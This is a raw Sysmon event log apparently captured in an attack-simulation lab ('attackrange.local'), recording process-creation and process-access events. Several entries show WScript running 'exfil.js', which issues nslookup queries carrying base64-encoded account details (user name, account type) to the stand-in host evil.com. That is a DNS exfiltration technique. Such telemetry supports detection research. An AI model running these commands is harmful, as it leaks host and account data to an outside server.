14:16:07.768{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E53D-000000005F02}7416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-17A1-629A-783D-000000005F02}55526012C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-E53D-000000005F02}7416C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.781{2E1864BB-17A7-629A-E53D-000000005F02}7416C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlqjpwjm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.768{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhymy.tmpMD5=24F4EB82345A0DA00DE01E116A71736E,SHA256=1239B48CF33DE00FBE8DCE68AC67A1D60A6D2C2E699D9B3665FAD4716A3235AA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-17A7-629A-E33D-000000005F02}9287764C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E43D-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E43D-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.753{2E1864BB-17A7-629A-E23D-000000005F02}77005404C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-E43D-000000005F02}7632C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.755{2E1864BB-17A7-629A-E43D-000000005F02}7632C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-E23D-000000005F02}7700C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhymy.tmp 2>&1 10341000x8000000000000000194622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.737{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E33D-000000005F02}928C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.737{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A7-629A-E33D-000000005F02}928C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.721{2E1864BB-17A7-629A-E33D-000000005F02}9287764C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E23D-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E33D-000000005F02}928C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E23D-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-17A1-629A-783D-000000005F02}55525416C:\Windows\System32\WScript.exe{2E1864BB-17A7-629A-E23D-000000005F02}7700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.710{2E1864BB-17A7-629A-E23D-000000005F02}7700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhymy.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.706{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlwpo.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.668{2E1864BB-17A7-629A-E03D-000000005F02}76723300C:\Windows\system32\conhost.exe{2E1864BB-17A7-629A-E13D-000000005F02}3460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A7-629A-E13D-000000005F02}3460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.653{2E1864BB-17A7-629A-DF3D-000000005F02}13442108C:\Windows\system32\cmd.exe{2E1864BB-17A7-629A-E13D-000000005F02}3460C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:07.662{2E1864BB-17A7-629A-E13D-000000005F02}3460C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A7-629A-DF3D-000000005F02}1344C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > 